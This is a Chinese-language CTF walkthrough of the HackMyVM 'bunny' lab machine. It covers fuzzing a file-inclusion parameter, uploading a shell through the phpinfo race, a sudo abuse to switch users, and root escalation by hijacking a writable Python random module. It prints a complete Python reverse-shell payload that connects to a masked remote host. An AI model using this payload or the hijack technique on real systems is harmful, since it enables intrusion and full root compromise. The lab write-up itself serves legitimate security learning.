hackmyvm-bunny walkthrough
hackmyvm-buny walkthrough
难度(作者评价):difficult
信息收集
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
获取shell
端口信息很少,常规操作,访问80,爆破目录。
upload.php,password.txt,config.php都是没有实际含义的文本文件。phpinfo.php泄露了主机的相关信息。
能想到的就是index.php是不是存在ssrf
。于是利用ffuf
对index.php进行参数fuzz,得到参数page
为实际请求参数。
由于allow_url_include
是off,所以没有办法进行php://input
和data
协议利用。 爆破日志文件也不能被利用来进行本地文件包含获取shell。
同时web服务中没有上传点,于是参考文章php文件包含漏洞(利用phpinfo)复现
[1],成功上传shell。
切换用户
为了操作方便获取pty,反弹一个shell,查看sudo
。
magic文件如下:
#/bin/bash
$1 $2 $3 -T -TT 'sh #'
很简单切换到用户chris
,得到第一个flag。
提权至root
利用pspy64
可以看到root每分钟在运行pendu.py
。
该文件没做什么事情,但是引入了random
。
从图中可以看到random是可以修改的。于是将random改成一个反弹shell。
chris@bunny:~$ cat /usr/lib/python3.7/random.py
cat /usr/lib/python3.7/random.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("*.*.*.*",5555))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
成功获取root权限。
参考
- https://www.cnblogs.com/xiaoqiyue/p/10158702.html
hackmyvm-bunny walkthrough相关推荐
- hackmyvm: kitty walkthrough
hackmyvm: kitty walkthrough 0x01 oracle padding 端口扫描: PORT STATE SERVICE 22/tcp open ssh 80/tcp open ...
- A Complete Machine Learning Walk-Through in Python
A Complete Machine Learning Project Walk-Through in Python: Part One A Complete Machine Learning Pro ...
- OPEN(SAP) UI5 学习入门系列之四:更好的入门系列-官方Walkthrough
好久没有更新了,实在不知道应该写一些什么内容,因为作为入门系列,实际上应该更多的是操作而不是理论,而在UI5 SDK中的EXPLORER里面有着各种控件的用法,所以在这里也没有必要再来一遍,还是看官方 ...
- exif viewer java,1earn/XSS挑战-WalkThrough.md at master · dizhaung/1earn · GitHub
XSS挑战-WalkThrough 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 知识点 无过滤 XSS (level 1) 各种难度 ...
- BSC 再现闪电贷攻击 BUNNY 闪崩
北京时间 5 月 20 日,BSC 链上的 DeFi 收益聚合器 PancakeBunny 遭到闪电贷攻击. PeckShield 「派盾」通过追踪和分析发现, 此次攻击源于攻击者利用 Pancake ...
- Walkthrough: Word 2007 XML 格式
本页内容 简介 Word 2007 文档包 Word XML格式的开放打包约定 解析Word 2007文件 确定Word 2007文档中的非XML部件 从文档中分离内容 理解数据存储 结论 简介 Mi ...
- OpenGL--------读取PLY格式的bunny兔子文件以便画出兔子
写在前面的话:PLY文件格式是Stanford大学开发的一套三维mesh模型数据格式,开发目标是建立一套针对多边形模型的,结构简单但是能够满足大多数图形应用需要的模型格式,而且它允许以ASCII码格式 ...
- C. Chocolate Bunny(思维)
题目传送门 Chocolate Bunny 题目大意 求一个长度为n的数组 每次可以输入两个值i和j询问,将会得到一个为pimodpjp_i\ mod\ p_jpi mod pj返回值,最多可以进 ...
- 又一打脸现场!Fork Bunny 的 Merlin 损失 240 ETH
妖怪已经从瓶子里跑出来了?我们剖析了 PancakeBunny 和 AutoShark 的闪电贷攻击原理和攻击者的链上转账记录,发现了 Merlin Labs 同源攻击的一些蛛丝马迹. 2021 年 ...
最新文章
- 安装fitz报错_解决python 虚拟环境删除包无法加载的问题
- 斯坦福前校长John Hennessy、张亚勤等一众大佬云集,共探最前沿技术 | CNCC2020
- selenium操作浏览器cookie方法
- ●BZOJ 2669 [cqoi2012]局部极小值
- 【指标统计】删除错误遥信
- OpenCV cv :: UMat与DirectX10曲面的互操作性的实例(附完整代码)
- linux下tomcat6.0与jdk安装详细步骤
- 还是畅通工程(HDU-1233)
- php多图片上传封装类,php----图片上传封装类:单张,多张图片上传,生成缩略图...
- zoj 1562 反素数 附上个人对反素数性质的证明
- 同行压力(兼谈敏捷团队,绩效管理,自组织团队)
- Atitit 头像文件上传功能实现目录1. 上传文件原理 11.1. 界面ui 11.2. 预览实现 21.3. 保存头像文件php 21.4. 保存文件nodejs java 32
- gradle下载慢的问题
- 基于python的web框架——Flask 学习笔记
- Windows 8 六大关机模式 详解
- 多水下机器人协同定位
- Could not clean server of obsolete
- 陌上花开、月下遐思……
- 常用颜色的RGB分布
- Python调用字符映射表输入特殊符号
热门文章
- 批量添加Exchange邮件联系人
- android studio上的基本动画实现(第一篇)
- 深度Linux拨号软件,Deepin调校及相关资源、常用软件整合贴
- unity射线检测高速飞行的子弹是否打到敌人
- STM32F103+RTT从零开始(三)—— S50门禁卡复制
- 网站seo优化推广方式有哪些?如何提高网站排名?
- Tikhonov 正则化模型用于图片去噪_matlab
- layer opcode oracle,ORACLE 事件追踪
- 叶筱静受邀主持北大“2019数字新金融领袖峰会”圆桌论坛
- python学习之路(3)turtle画奥运五环